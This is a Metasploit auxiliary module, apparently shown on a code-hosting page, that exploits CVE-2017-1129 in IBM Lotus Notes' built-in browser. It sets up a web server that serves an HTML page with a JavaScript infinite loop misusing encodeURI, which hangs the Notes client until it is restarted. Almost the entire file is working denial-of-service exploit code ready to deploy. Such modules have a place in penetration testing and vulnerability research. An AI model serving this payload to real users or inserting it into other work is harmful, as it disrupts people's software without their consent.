Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpServer
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name'           => "IBM Notes encodeURI DOS",
14
        'Description'    => %q(
15
          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
16
          If successful, it could cause the Notes client to hang and have to be restarted.
17
        ),
18
        'License'        => MSF_LICENSE,
19
        'Author'         => [
20
          'Dhiraj Mishra',
21
        ],
22
        'References'     => [
23
          [ 'EDB', '42602'],
24
          [ 'CVE', '2017-1129' ],
25
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
26
        ],
27
        'DisclosureDate' => '2017-08-31',
28
        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
29
        'PassiveActions' => [ 'WebServer' ],
30
        'DefaultAction'  => 'WebServer'
31
      )
32
    )
33
  end
34

35
  def run
36
    exploit # start http server
37
  end
38

39
  def setup
40
    @html = %|
41
    <html><head><title>DOS</title>
42
<script type="text/javascript">
43
while (true) try {
44
                var object = { };
45
                function d(d0) {
46
                        var d0 = (object instanceof encodeURI)('foo');
47
                }
48
                d(75);
49
        } catch (d) { }
50
</script>
51
</head></html>
52
    |
53
  end
54

55
  def on_request_uri(cli, _request)
56
    print_status('Sending response')
57
    send_response(cli, @html)
58
  end
59
end
60

61